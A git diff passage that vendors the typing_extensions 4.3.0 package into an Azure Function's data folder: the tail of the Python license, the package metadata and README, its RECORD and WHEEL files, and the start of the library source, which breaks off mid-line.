compatible? (1) + + 0.9.0 thru 1.2 1991-1995 CWI yes + 1.3 thru 1.5.2 1.2 1995-1999 CNRI yes + 1.6 1.5.2 2000 CNRI no + 2.0 1.6 2000 BeOpen.com no + 1.6.1 1.6 2001 CNRI yes (2) + 2.1 2.0+1.6.1 2001 PSF no + 2.0.1 2.0+1.6.1 2001 PSF yes + 2.1.1 2.1+2.0.1 2001 PSF yes + 2.1.2 2.1.1 2002 PSF yes + 2.1.3 2.1.2 2002 PSF yes + 2.2 and above 2.1.1 2001-now PSF yes + +Footnotes: + +(1) GPL-compatible doesn't mean that we're distributing Python under + the GPL. All Python licenses, unlike the GPL, let you distribute + a modified version without making your changes open source. The + GPL-compatible licenses make it possible to combine Python with + other software that is released under the GPL; the others don't. + +(2) According to Richard Stallman, 1.6.1 is not GPL-compatible, + because its license has a choice of law clause. According to + CNRI, however, Stallman's lawyer has told CNRI's lawyer that 1.6.1 + is "not incompatible" with the GPL. + +Thanks to the many outside volunteers who have worked under Guido's +direction to make these releases possible. + + +B. TERMS AND CONDITIONS FOR ACCESSING OR OTHERWISE USING PYTHON +=============================================================== + +PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2 +-------------------------------------------- + +1. This LICENSE AGREEMENT is between the Python Software Foundation +("PSF"), and the Individual or Organization ("Licensee") accessing and +otherwise using this software ("Python") in source or binary form and +its associated documentation. + +2. Subject to the terms and conditions of this License Agreement, PSF hereby +grants Licensee a nonexclusive, royalty-free, world-wide license to reproduce, +analyze, test, perform and/or display publicly, prepare derivative works, +distribute, and otherwise use Python alone or in any derivative version, +provided, however, that PSF's License Agreement and PSF's notice of copyright, +i.e., "Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, +2011, 2012, 2013, 2014 Python Software Foundation; All Rights Reserved" are +retained in Python alone or in any derivative version prepared by Licensee. + +3. In the event Licensee prepares a derivative work that is based on +or incorporates Python or any part thereof, and wants to make +the derivative work available to others as provided herein, then +Licensee hereby agrees to include in any such work a brief summary of +the changes made to Python. + +4. PSF is making Python available to Licensee on an "AS IS" +basis. PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR +IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND +DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS +FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON WILL NOT +INFRINGE ANY THIRD PARTY RIGHTS. + +5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON +FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS +A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON, +OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. + +6. This License Agreement will automatically terminate upon a material +breach of its terms and conditions. + +7. Nothing in this License Agreement shall be deemed to create any +relationship of agency, partnership, or joint venture between PSF and +Licensee. This License Agreement does not grant permission to use PSF +trademarks or trade name in a trademark sense to endorse or promote +products or services of Licensee, or any third party. + +8. By copying, installing or otherwise using Python, Licensee +agrees to be bound by the terms and conditions of this License +Agreement. + + +BEOPEN.COM LICENSE AGREEMENT FOR PYTHON 2.0 +------------------------------------------- + +BEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1 + +1. This LICENSE AGREEMENT is between BeOpen.com ("BeOpen"), having an +office at 160 Saratoga Avenue, Santa Clara, CA 95051, and the +Individual or Organization ("Licensee") accessing and otherwise using +this software in source or binary form and its associated +documentation ("the Software"). + +2. Subject to the terms and conditions of this BeOpen Python License +Agreement, BeOpen hereby grants Licensee a non-exclusive, +royalty-free, world-wide license to reproduce, analyze, test, perform +and/or display publicly, prepare derivative works, distribute, and +otherwise use the Software alone or in any derivative version, +provided, however, that the BeOpen Python License is retained in the +Software, alone or in any derivative version prepared by Licensee. + +3. BeOpen is making the Software available to Licensee on an "AS IS" +basis. BEOPEN MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR +IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND +DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS +FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE WILL NOT +INFRINGE ANY THIRD PARTY RIGHTS. + +4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE +SOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS +AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY +DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. + +5. This License Agreement will automatically terminate upon a material +breach of its terms and conditions. + +6. This License Agreement shall be governed by and interpreted in all +respects by the law of the State of California, excluding conflict of +law provisions. Nothing in this License Agreement shall be deemed to +create any relationship of agency, partnership, or joint venture +between BeOpen and Licensee. This License Agreement does not grant +permission to use BeOpen trademarks or trade names in a trademark +sense to endorse or promote products or services of Licensee, or any +third party. As an exception, the "BeOpen Python" logos available at +http://www.pythonlabs.com/logos.html may be used according to the +permissions granted on that web page. + +7. By copying, installing or otherwise using the software, Licensee +agrees to be bound by the terms and conditions of this License +Agreement. + + +CNRI LICENSE AGREEMENT FOR PYTHON 1.6.1 +--------------------------------------- + +1. This LICENSE AGREEMENT is between the Corporation for National +Research Initiatives, having an office at 1895 Preston White Drive, +Reston, VA 20191 ("CNRI"), and the Individual or Organization +("Licensee") accessing and otherwise using Python 1.6.1 software in +source or binary form and its associated documentation. + +2. Subject to the terms and conditions of this License Agreement, CNRI +hereby grants Licensee a nonexclusive, royalty-free, world-wide +license to reproduce, analyze, test, perform and/or display publicly, +prepare derivative works, distribute, and otherwise use Python 1.6.1 +alone or in any derivative version, provided, however, that CNRI's +License Agreement and CNRI's notice of copyright, i.e., "Copyright (c) +1995-2001 Corporation for National Research Initiatives; All Rights +Reserved" are retained in Python 1.6.1 alone or in any derivative +version prepared by Licensee. Alternately, in lieu of CNRI's License +Agreement, Licensee may substitute the following text (omitting the +quotes): "Python 1.6.1 is made available subject to the terms and +conditions in CNRI's License Agreement. This Agreement together with +Python 1.6.1 may be located on the Internet using the following +unique, persistent identifier (known as a handle): 1895.22/1013. This +Agreement may also be obtained from a proxy server on the Internet +using the following URL: http://hdl.handle.net/1895.22/1013". + +3. In the event Licensee prepares a derivative work that is based on +or incorporates Python 1.6.1 or any part thereof, and wants to make +the derivative work available to others as provided herein, then +Licensee hereby agrees to include in any such work a brief summary of +the changes made to Python 1.6.1. + +4. CNRI is making Python 1.6.1 available to Licensee on an "AS IS" +basis. CNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR +IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND +DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS +FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON 1.6.1 WILL NOT +INFRINGE ANY THIRD PARTY RIGHTS. + +5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON +1.6.1 FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS +A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 1.6.1, +OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. + +6. This License Agreement will automatically terminate upon a material +breach of its terms and conditions. + +7. This License Agreement shall be governed by the federal +intellectual property law of the United States, including without +limitation the federal copyright law, and, to the extent such +U.S. federal law does not apply, by the law of the Commonwealth of +Virginia, excluding Virginia's conflict of law provisions. +Notwithstanding the foregoing, with regard to derivative works based +on Python 1.6.1 that incorporate non-separable material that was +previously distributed under the GNU General Public License (GPL), the +law of the Commonwealth of Virginia shall govern this License +Agreement only as to issues arising under or with respect to +Paragraphs 4, 5, and 7 of this License Agreement. Nothing in this +License Agreement shall be deemed to create any relationship of +agency, partnership, or joint venture between CNRI and Licensee. This +License Agreement does not grant permission to use CNRI trademarks or +trade name in a trademark sense to endorse or promote products or +services of Licensee, or any third party. + +8. By clicking on the "ACCEPT" button where indicated, or by copying, +installing or otherwise using Python 1.6.1, Licensee agrees to be +bound by the terms and conditions of this License Agreement. + + ACCEPT + + +CWI LICENSE AGREEMENT FOR PYTHON 0.9.0 THROUGH 1.2 +-------------------------------------------------- + +Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam, +The Netherlands. All rights reserved. + +Permission to use, copy, modify, and distribute this software and its +documentation for any purpose and without fee is hereby granted, +provided that the above copyright notice appear in all copies and that +both that copyright notice and this permission notice appear in +supporting documentation, and that the name of Stichting Mathematisch +Centrum or CWI not be used in advertising or publicity pertaining to +distribution of the software without specific, written prior +permission. + +STICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO +THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND +FITNESS, IN NO EVENT SHALL STICHTING MATHEMATISCH CENTRUM BE LIABLE +FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT +OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/METADATA new file mode 100644 index 0000000..4434e70 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/METADATA @@ -0,0 +1,176 @@ +Metadata-Version: 2.1 +Name: typing_extensions +Version: 4.3.0 +Summary: Backported and Experimental Type Hints for Python 3.7+ +Keywords: annotations,backport,checker,checking,function,hinting,hints,type,typechecking,typehinting,typehints,typing +Author-email: "Guido van Rossum, Jukka Lehtosalo, Łukasz Langa, Michael Lee" +Requires-Python: >=3.7 +Description-Content-Type: text/markdown +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Console +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: Python Software Foundation License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Topic :: Software Development +Project-URL: Bug Tracker, https://github.com/python/typing_extensions/issues +Project-URL: Changes, https://github.com/python/typing_extensions/blob/main/CHANGELOG.md +Project-URL: Documentation, https://typing.readthedocs.io/ +Project-URL: Home, https://github.com/python/typing_extensions +Project-URL: Q & A, https://github.com/python/typing/discussions +Project-URL: Repository, https://github.com/python/typing_extensions + +# Typing Extensions + +[![Chat at https://gitter.im/python/typing](https://badges.gitter.im/python/typing.svg)](https://gitter.im/python/typing) + +## Overview + +The `typing_extensions` module serves two related purposes: + +- Enable use of new type system features on older Python versions. For example, + `typing.TypeGuard` is new in Python 3.10, but `typing_extensions` allows + users on Python 3.6 through 3.9 to use it too. +- Enable experimentation with new type system PEPs before they are accepted and + added to the `typing` module. + +New features may be added to `typing_extensions` as soon as they are specified +in a PEP that has been added to the [python/peps](https://github.com/python/peps) +repository. If the PEP is accepted, the feature will then be added to `typing` +for the next CPython release. No typing PEP has been rejected so far, so we +haven't yet figured out how to deal with that possibility. + +Starting with version 4.0.0, `typing_extensions` uses +[Semantic Versioning](https://semver.org/). The +major version is incremented for all backwards-incompatible changes. +Therefore, it's safe to depend +on `typing_extensions` like this: `typing_extensions >=x.y, <(x+1)`, +where `x.y` is the first version that includes all features you need. + +`typing_extensions` supports Python versions 3.7 and higher. In the future, +support for older Python versions will be dropped some time after that version +reaches end of life. + +## Included items + +This module currently contains the following: + +- Experimental features + + - (Currently none) + +- In `typing` since Python 3.11 + + - `assert_never` + - `assert_type` + - `clear_overloads` + - `@dataclass_transform()` (see PEP 681) + - `get_overloads` + - `LiteralString` (see PEP 675) + - `Never` + - `NotRequired` (see PEP 655) + - `reveal_type` + - `Required` (see PEP 655) + - `Self` (see PEP 673) + - `TypeVarTuple` (see PEP 646) + - `Unpack` (see PEP 646) + +- In `typing` since Python 3.10 + + - `Concatenate` (see PEP 612) + - `ParamSpec` (see PEP 612) + - `ParamSpecArgs` (see PEP 612) + - `ParamSpecKwargs` (see PEP 612) + - `TypeAlias` (see PEP 613) + - `TypeGuard` (see PEP 647) + - `is_typeddict` + +- In `typing` since Python 3.9 + + - `Annotated` (see PEP 593) + +- In `typing` since Python 3.8 + + - `final` (see PEP 591) + - `Final` (see PEP 591) + - `Literal` (see PEP 586) + - `Protocol` (see PEP 544) + - `runtime_checkable` (see PEP 544) + - `TypedDict` (see PEP 589) + - `get_origin` (`typing_extensions` provides this function only in Python 3.7+) + - `get_args` (`typing_extensions` provides this function only in Python 3.7+) + +- In `typing` since Python 3.7 + + - `OrderedDict` + +- In `typing` since Python 3.5 or 3.6 (see [the typing documentation](https://docs.python.org/3.10/library/typing.html) for details) + + - `AsyncContextManager` + - `AsyncGenerator` + - `AsyncIterable` + - `AsyncIterator` + - `Awaitable` + - `ChainMap` + - `ClassVar` (see PEP 526) + - `ContextManager` + - `Coroutine` + - `Counter` + - `DefaultDict` + - `Deque` + - `NamedTuple` + - `NewType` + - `NoReturn` + - `overload` + - `Text` + - `Type` + - `TYPE_CHECKING` + - `get_type_hints` + +# Other Notes and Limitations + +Certain objects were changed after they were added to `typing`, and +`typing_extensions` provides a backport even on newer Python versions: + +- `TypedDict` does not store runtime information + about which (if any) keys are non-required in Python 3.8, and does not + honor the `total` keyword with old-style `TypedDict()` in Python + 3.9.0 and 3.9.1. `TypedDict` also does not support multiple inheritance + with `typing.Generic` on Python <3.11. +- `get_origin` and `get_args` lack support for `Annotated` in + Python 3.8 and lack support for `ParamSpecArgs` and `ParamSpecKwargs` + in 3.9. +- `@final` was changed in Python 3.11 to set the `.__final__` attribute. +- `@overload` was changed in Python 3.11 to make function overloads + introspectable at runtime. In order to access overloads with + `typing_extensions.get_overloads()`, you must use + `@typing_extensions.overload`. +- `NamedTuple` was changed in Python 3.11 to allow for multiple inheritance + with `typing.Generic`. + +There are a few types whose interface was modified between different +versions of typing. For example, `typing.Sequence` was modified to +subclass `typing.Reversible` as of Python 3.5.3. + +These changes are _not_ backported to prevent subtle compatibility +issues when mixing the differing implementations of modified classes. + +Certain types have incorrect runtime behavior due to limitations of older +versions of the typing module: + +- `ParamSpec` and `Concatenate` will not work with `get_args` and + `get_origin`. Certain PEP 612 special cases in user-defined + `Generic`s are also not available. + +These types are only guaranteed to work for static type checking. + +## Running tests + +To run tests, navigate into the appropriate source directory and run +`test_typing_extensions.py`. + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/RECORD new file mode 100644 index 0000000..eadf0f5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/RECORD @@ -0,0 +1,7 @@ +__pycache__/typing_extensions.cpython-39.pyc,, +typing_extensions-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +typing_extensions-4.3.0.dist-info/LICENSE,sha256=_xfOlOECAk3raHc-scx0ynbaTmWPNzUx8Kwi1oprsa0,12755 +typing_extensions-4.3.0.dist-info/METADATA,sha256=Gc182SCaY3PXonSf1hdCKS9NGE0QLoBnxSS9V9VCOIk,6350 +typing_extensions-4.3.0.dist-info/RECORD,, +typing_extensions-4.3.0.dist-info/WHEEL,sha256=4TfKIB_xu-04bc2iKz6_zFt-gEFEEDU_31HGhqzOCE8,81 +typing_extensions.py,sha256=uZ95U2XP0uVC6SD6OhMsspPxUi7HaLXBIulP58ImWDA,75384 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/WHEEL new file mode 100644 index 0000000..26cc612 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions-4.3.0.dist-info/WHEEL @@ -0,0 +1,4 @@ +Wheel-Version: 1.0 +Generator: flit 3.7.1 +Root-Is-Purelib: true +Tag: py3-none-any diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions.py new file mode 100644 index 0000000..584d521 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/typing_extensions.py @@ -0,0 +1,2069 @@ +import abc +import collections +import collections.abc +import functools +import operator +import sys +import types as _types +import typing + + +# Please keep __all__ alphabetized within each category. +__all__ = [ + # Super-special typing primitives. + 'ClassVar', + 'Concatenate', + 'Final', + 'LiteralString', + 'ParamSpec', + 'ParamSpecArgs', + 'ParamSpecKwargs', + 'Self', + 'Type', + 'TypeVarTuple', + 'Unpack', + + # ABCs (from collections.abc). + 'Awaitable', + 'AsyncIterator', + 'AsyncIterable', + 'Coroutine', + 'AsyncGenerator', + 'AsyncContextManager', + 'ChainMap', + + # Concrete collection types. + 'ContextManager', + 'Counter', + 'Deque', + 'DefaultDict', + 'NamedTuple', + 'OrderedDict', + 'TypedDict', + + # Structural checks, a.k.a. protocols. + 'SupportsIndex', + + # One-off things. + 'Annotated', + 'assert_never', + 'assert_type', + 'clear_overloads', + 'dataclass_transform', + 'get_overloads', + 'final', + 'get_args', + 'get_origin', + 'get_type_hints', + 'IntVar', + 'is_typeddict', + 'Literal', + 'NewType', + 'overload', + 'Protocol', + 'reveal_type', + 'runtime', + 'runtime_checkable', + 'Text', + 'TypeAlias', + 'TypeGuard', + 'TYPE_CHECKING', + 'Never', + 'NoReturn', + 'Required', + 'NotRequired', +] + +# for backward compatibility +PEP_560 = True +GenericMeta = type + +# The functions below are modified copies of typing internal helpers. +# They are needed by _ProtocolMeta and they provide support for PEP 646. + +_marker = object() + + +def _check_generic(cls, parameters, elen=_marker): + """Check correct count for parameters of a generic cls (internal helper). + This gives a nice error message in case of count mismatch. + """ + if not elen: + raise TypeError(f"{cls} is not a generic class") + if elen is _marker: + if not hasattr(cls, "__parameters__") or not cls.__parameters__: + raise TypeError(f"{cls} is not a generic class") + elen = len(cls.__parameters__) + alen = len(parameters) + if alen != elen: + if hasattr(cls, "__parameters__"): + parameters = [p for p in cls.__parameters__ if not _is_unpack(p)] + num_tv_tuples = sum(isinstance(p, TypeVarTuple) for p in parameters) + if (num_tv_tuples > 0) and (alen >= elen - num_tv_tuples): + return + raise TypeError(f"Too {'many' if alen > elen else 'few'} parameters for {cls};" + f" actual {alen}, expected {elen}") + + +if sys.version_info >= (3, 10): + def _should_collect_from_parameters(t): + return isinstance( + t, (typing._GenericAlias, _types.GenericAlias, _types.UnionType) + ) +elif sys.version_info >= (3, 9): + def _should_collect_from_parameters(t): + return isinstance(t, (typing._GenericAlias, _types.GenericAlias)) +else: + def _should_collect_from_parameters(t): + return isinstance(t, typing._GenericAlias) and not t._special + + +def _collect_type_vars(types, typevar_types=None): + """Collect all type variable contained in types in order of + first appearance (lexicographic order). For example:: + + _collect_type_vars((T, List[S, T])) == (T, S) + """ + if typevar_types is None: + typevar_types = typing.TypeVar + tvars = [] + for t in types: + if ( + isinstance(t, typevar_types) and + t not in tvars and + not _is_unpack(t) + ): + tvars.append(t) + if _should_collect_from_parameters(t): + tvars.extend([t for t in t.__parameters__ if t not in tvars]) + return tuple(tvars) + + +NoReturn = typing.NoReturn + +# Some unconstrained type variables. These are used by the container types. +# (These are not for export.) +T = typing.TypeVar('T') # Any type. +KT = typing.TypeVar('KT') # Key type. +VT = typing.TypeVar('VT') # Value type. +T_co = typing.TypeVar('T_co', covariant=True) # Any type covariant containers. +T_contra = typing.TypeVar('T_contra', contravariant=True) # Ditto contravariant. + +ClassVar = typing.ClassVar + +# On older versions of typing there is an internal class named "Final". +# 3.8+ +if hasattr(typing, 'Final') and sys.version_info[:2] >= (3, 7): + Final = typing.Final +# 3.7 +else: + class _FinalForm(typing._SpecialForm, _root=True): + + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + item = typing._type_check(parameters, + f'{self._name} accepts only a single type.') + return typing._GenericAlias(self, (item,)) + + Final = _FinalForm('Final', + doc="""A special typing construct to indicate that a name + cannot be re-assigned or overridden in a subclass. + For example: + + MAX_SIZE: Final = 9000 + MAX_SIZE += 1 # Error reported by type checker + + class Connection: + TIMEOUT: Final[int] = 10 + class FastConnector(Connection): + TIMEOUT = 1 # Error reported by type checker + + There is no runtime checking of these properties.""") + +if sys.version_info >= (3, 11): + final = typing.final +else: + # @final exists in 3.8+, but we backport it for all versions + # before 3.11 to keep support for the __final__ attribute. + # See https://bugs.python.org/issue46342 + def final(f): + """This decorator can be used to indicate to type checkers that + the decorated method cannot be overridden, and decorated class + cannot be subclassed. For example: + + class Base: + @final + def done(self) -> None: + ... + class Sub(Base): + def done(self) -> None: # Error reported by type checker + ... + @final + class Leaf: + ... + class Other(Leaf): # Error reported by type checker + ... + + There is no runtime checking of these properties. The decorator + sets the ``__final__`` attribute to ``True`` on the decorated object + to allow runtime introspection. + """ + try: + f.__final__ = True + except (AttributeError, TypeError): + # Skip the attribute silently if it is not writable. + # AttributeError happens if the object has __slots__ or a + # read-only property, TypeError if it's a builtin class. + pass + return f + + +def IntVar(name): + return typing.TypeVar(name) + + +# 3.8+: +if hasattr(typing, 'Literal'): + Literal = typing.Literal +# 3.7: +else: + class _LiteralForm(typing._SpecialForm, _root=True): + + def __repr__(self): + return 'typing_extensions.' + self._name + + def __getitem__(self, parameters): + return typing._GenericAlias(self, parameters) + + Literal = _LiteralForm('Literal', + doc="""A type that can be used to indicate to type checkers + that the corresponding value has a value literally equivalent + to the provided parameter. For example: + + var: Literal[4] = 4 + + The type checker understands that 'var' is literally equal to + the value 4 and no other value. + + Literal[...] cannot be subclassed. There is no runtime + checking verifying that the parameter is actually a value + instead of a type.""") + + +_overload_dummy = typing._overload_dummy # noqa + + +if hasattr(typing, "get_overloads"): # 3.11+ + overload = typing.overload + get_overloads = typing.get_overloads + clear_overloads = typing.clear_overloads +else: + # {module: {qualname: {firstlineno: func}}} + _overload_registry = collections.defaultdict( + functools.partial(collections.defaultdict, dict) + ) + + def overload(func): + """Decorator for overloaded functions/methods. + + In a stub file, place two or more stub definitions for the same + function in a row, each decorated with @overload. For example: + + @overload + def utf8(value: None) -> None: ... + @overload + def utf8(value: bytes) -> bytes: ... + @overload + def utf8(value: str) -> bytes: ... + + In a non-stub file (i.e. a regular .py file), do the same but + follow it with an implementation. The implementation should *not* + be decorated with @overload. For example: + + @overload + def utf8(value: None) -> None: ... + @overload + def utf8(value: bytes) -> bytes: ... + @overload + def utf8(value: str) -> bytes: ... + def utf8(value): + # implementation goes here + + The overloads for a function can be retrieved at runtime using the + get_overloads() function. + """ + # classmethod and staticmethod + f = getattr(func, "__func__", func) + try: + _overload_registry[f.__module__][f.__qualname__][ + f.__code__.co_firstlineno + ] = func + except AttributeError: + # Not a normal function; ignore. + pass + return _overload_dummy + + def get_overloads(func): + """Return all defined overloads for *func* as a sequence.""" + # classmethod and staticmethod + f = getattr(func, "__func__", func) + if f.__module__ not in _overload_registry: + return [] + mod_dict = _overload_registry[f.__module__] + if f.__qualname__ not in mod_dict: + return [] + return list(mod_dict[f.__qualname__].values()) + + def clear_overloads(): + """Clear all overloads in the registry.""" + _overload_registry.clear() + + +# This is not a real generic class. Don't use outside annotations. +Type = typing.Type + +# Various ABCs mimicking those in collections.abc. +# A few are simply re-exported for completeness. + + +Awaitable = typing.Awaitable +Coroutine = typing.Coroutine +AsyncIterable = typing.AsyncIterable +AsyncIterator = typing.AsyncIterator +Deque = typing.Deque +ContextManager = typing.ContextManager +AsyncContextManager = typing.AsyncContextManager +DefaultDict = typing.DefaultDict + +# 3.7.2+ +if hasattr(typing, 'OrderedDict'): + OrderedDict = typing.OrderedDict +# 3.7.0-3.7.2 +else: + OrderedDict = typing._alias(collections.OrderedDict, (KT, VT)) + +Counter = typing.Counter +ChainMap = typing.ChainMap +AsyncGenerator = typing.AsyncGenerator +NewType = typing.NewType +Text = typing.Text +TYPE_CHECKING = typing.TYPE_CHECKING + + +_PROTO_WHITELIST = ['Callable', 'Awaitable', + 'Iterable', 'Iterator', 'AsyncIterable', 'AsyncIterator', + 'Hashable', 'Sized', 'Container', 'Collection', 'Reversible', + 'ContextManager', 'AsyncContextManager'] + + +def _get_protocol_attrs(cls): + attrs = set() + for base in cls.__mro__[:-1]: # without object + if base.__name__ in ('Protocol', 'Generic'): + continue + annotations = getattr(base, '__annotations__', {}) + for attr in list(base.__dict__.keys()) + list(annotations.keys()): + if (not attr.startswith('_abc_') and attr not in ( + '__abstractmethods__', '__annotations__', '__weakref__', + '_is_protocol', '_is_runtime_protocol', '__dict__', + '__args__', '__slots__', + '__next_in_mro__', '__parameters__', '__origin__', + '__orig_bases__', '__extra__', '__tree_hash__', + '__doc__', '__subclasshook__', '__init__', '__new__', + '__module__', '_MutableMapping__marker', '_gorg')): + attrs.add(attr) + return attrs + + +def _is_callable_members_only(cls): + return all(callable(getattr(cls, attr, None)) for attr in _get_protocol_attrs(cls)) + + +def _maybe_adjust_parameters(cls): + """Helper function used in Protocol.__init_subclass__ and _TypedDictMeta.__new__. + + The contents of this function are very similar + to logic found in typing.Generic.__init_subclass__ + on the CPython main branch. + """ + tvars = [] + if '__orig_bases__' in cls.__dict__: + tvars = typing._collect_type_vars(cls.__orig_bases__) + # Look for Generic[T1, ..., Tn] or Protocol[T1, ..., Tn]. + # If found, tvars must be a subset of it. + # If not found, tvars is it. + # Also check for and reject plain Generic, + # and reject multiple Generic[...] and/or Protocol[...]. + gvars = None + for base in cls.__orig_bases__: + if (isinstance(base, typing._GenericAlias) and + base.__origin__ in (typing.Generic, Protocol)): + # for error messages + the_base = base.__origin__.__name__ + if gvars is not None: + raise TypeError( + "Cannot inherit from Generic[...]" + " and/or Protocol[...] multiple types.") + gvars = base.__parameters__ + if gvars is None: + gvars = tvars + else: + tvarset = set(tvars) + gvarset = set(gvars) + if not tvarset <= gvarset: + s_vars = ', '.join(str(t) for t in tvars if t not in gvarset) + s_args = ', '.join(str(g) for g in gvars) + raise TypeError(f"Some type variables ({s_vars}) are" + f" not listed in {the_base}[{s_args}]") + tvars = gvars + cls.__parameters__ = tuple(tvars) + + +# 3.8+ +if hasattr(typing, 'Protocol'): + Protocol = typing.Protocol +# 3.7 +else: + + def _no_init(self, *args, **kwargs): + if type(self)._is_protocol: + raise TypeError('Protocols cannot be instantiated') + + class _ProtocolMeta(abc.ABCMeta): + # This metaclass is a bit unfortunate and exists only because of the lack + # of __instancehook__. + def __instancecheck__(cls, instance): + # We need this method for situations where attributes are + # assigned in __init__. + if ((not getattr(cls, '_is_protocol', False) or + _is_callable_members_only(cls)) and + issubclass(instance.__class__, cls)): + return True + if cls._is_protocol: + if all(hasattr(instance, attr) and + (not callable(getattr(cls, attr, None)) or + getattr(instance, attr) is not None) + for attr in _get_protocol_attrs(cls)): + return True + return super().__instancecheck__(instance) + + class Protocol(metaclass=_ProtocolMeta): + # There is quite a lot of overlapping code with typing.Generic. + # Unfortunately it is hard to avoid this while these live in two different + # modules. The duplicated code will be removed when Protocol is moved to typing. + """Base class for protocol classes. Protocol classes are defined as:: + + class Proto(Protocol): + def meth(self) -> int: + ... + + Such classes are primarily used with static type checkers that recognize + structural subtyping (static duck-typing), for example:: + + class C: + def meth(self) -> int: + return 0 + + def func(x: Proto) -> int: + return x.meth() + + func(C()) # Passes static type check + + See PEP 544 for details. Protocol classes decorated with + @typing_extensions.runtime act as simple-minded runtime protocol that checks + only the presence of given attributes, ignoring their type signatures. + + Protocol classes can be generic, they are defined as:: + + class GenProto(Protocol[T]): + def meth(self) -> T: + ... + """ + __slots__ = () + _is_protocol = True + + def __new__(cls, *args, **kwds): + if cls is Protocol: + raise TypeError("Type Protocol cannot be instantiated; " + "it can only be used as a base class") + return super().__new__(cls) + + @typing._tp_cache + def __class_getitem__(cls, params): + if not isinstance(params, tuple): + params = (params,) + if not params and cls is not typing.Tuple: + raise TypeError( + f"Parameter list to {cls.__qualname__}[...] cannot be empty") + msg = "Parameters to generic types must be types." + params = tuple(typing._type_check(p, msg) for p in params) # noqa + if cls is Protocol: + # Generic can only be subscripted with unique type variables. + if not all(isinstance(p, typing.TypeVar) for p in params): + i = 0 + while isinstance(params[i], typing.TypeVar): + i += 1 + raise TypeError( + "Parameters to Protocol[...] must all be type variables." + f" Parameter {i + 1} is {params[i]}") + if len(set(params)) != len(params): + raise TypeError( + "Parameters to Protocol[...] must all be unique") + else: + # Subscripting a regular Generic subclass. + _check_generic(cls, params, len(cls.__parameters__)) + return typing._GenericAlias(cls, params) + + def __init_subclass__(cls, *args, **kwargs): + if '__orig_bases__' in cls.__dict__: + error = typing.Generic in cls.__orig_bases__ + else: + error = typing.Generic in 